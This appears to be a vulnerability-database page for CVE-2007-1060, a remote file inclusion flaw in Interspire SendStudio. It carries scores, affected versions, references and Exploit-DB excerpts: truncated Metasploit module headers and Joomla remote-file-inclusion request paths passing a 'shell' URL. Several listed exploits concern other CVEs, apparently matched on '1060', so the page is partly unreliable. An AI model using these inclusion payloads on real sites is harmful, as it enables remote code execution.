CVE-2007-1060
published 2007-02-22CVE-2007-1060: Multiple PHP remote file inclusion vulnerabilities in Interspire SendStudio 2004.14 and earlier, when register_globals and allow_fopenurl are enabled, allow…
PriorityP343medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
7.82%
93.9th percentile
Multiple PHP remote file inclusion vulnerabilities in Interspire SendStudio 2004.14 and earlier, when register_globals and allow_fopenurl are enabled, allow remote attackers to execute arbitrary PHP code via a URL in the ROOTDIR parameter to (1) createemails.inc.php and (2) send_emails.inc.php in /admin/includes/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| interspire | sendstudio | <= 2004.14 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-1070 Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)
Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_serverprotect.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Trend Micro ServerProtect 5.58 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'Re
Exploit-DB
Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-2508 Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)
Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_serverprotect_createbinding.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MS
Exploit-DB
Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-2508 Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)
Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_serverprotect_earthagent.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060
EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'Lice
Exploit-DB
Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion
exploitdb·2007-10-11
CVE-2007-5457 Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion
Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion
---
= =
= Mdx (c) 2007 =
= =
= =
=Joomla com_joomla_flash_uploader Remote File Include 2.5.1,2.5.2
= =
=
= Download:
=
= http://download.joomlaportal.ch/content/view/1060/
=
=
= Exploit:
= administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
= administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
= =
=Tüm Ãslam Alemininin Bayramý Mubarek olsun
= =
Thanks : Xoron,Deltaforce,Nizam-ül Mülk, Prime Suspect,CyberEx,mith,n0th!ng,CwPeker,Cyber_cobra,CyberWar,Musty
@zr@il-,DaRKToLe,ultrAslan_CW,quantumhalil,schevko ,nirvana_jr,mertcesur,reddevil19,hocam,muhammed4554,WarriorHacker
cepuzmani_53,kalaba,Dr.X
Exploit-DB
SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion
exploitdb·2007-02-20
CVE-2007-1060 SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion
SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_66$2007
[ECHO_ADV_66$2007] SendStudio <= 2004.14 Remote File Inclusion Vulnerability
Author : M.Hasran Addahroni
Date : Feb, 20th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv66-K-159-2007.txt
Critical Lvl : Dangerous
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : SendStudio
version : <= 2004.14
URL : http://www.interspire.com/sendstudio/
Description :
SendStudio is PHP email marketing software that lets you create, send and track an unlimited number of email messages and autoresponders. Over
No writeups or analysis indexed.
http://advisories.echo.or.id/adv/adv66-K-159-2007.txthttp://osvdb.org/33264http://osvdb.org/33265http://secunia.com/advisories/24212http://www.securityfocus.com/archive/1/460964/100/0/threadedhttp://www.securityfocus.com/archive/1/461019/100/0/threadedhttp://www.securityfocus.com/bid/22642http://www.vupen.com/english/advisories/2007/0672https://exchange.xforce.ibmcloud.com/vulnerabilities/32602https://www.exploit-db.com/exploits/3348http://advisories.echo.or.id/adv/adv66-K-159-2007.txthttp://osvdb.org/33264http://osvdb.org/33265http://secunia.com/advisories/24212http://www.securityfocus.com/archive/1/460964/100/0/threadedhttp://www.securityfocus.com/archive/1/461019/100/0/threadedhttp://www.securityfocus.com/bid/22642http://www.vupen.com/english/advisories/2007/0672https://exchange.xforce.ibmcloud.com/vulnerabilities/32602https://www.exploit-db.com/exploits/3348
2007-02-22
Published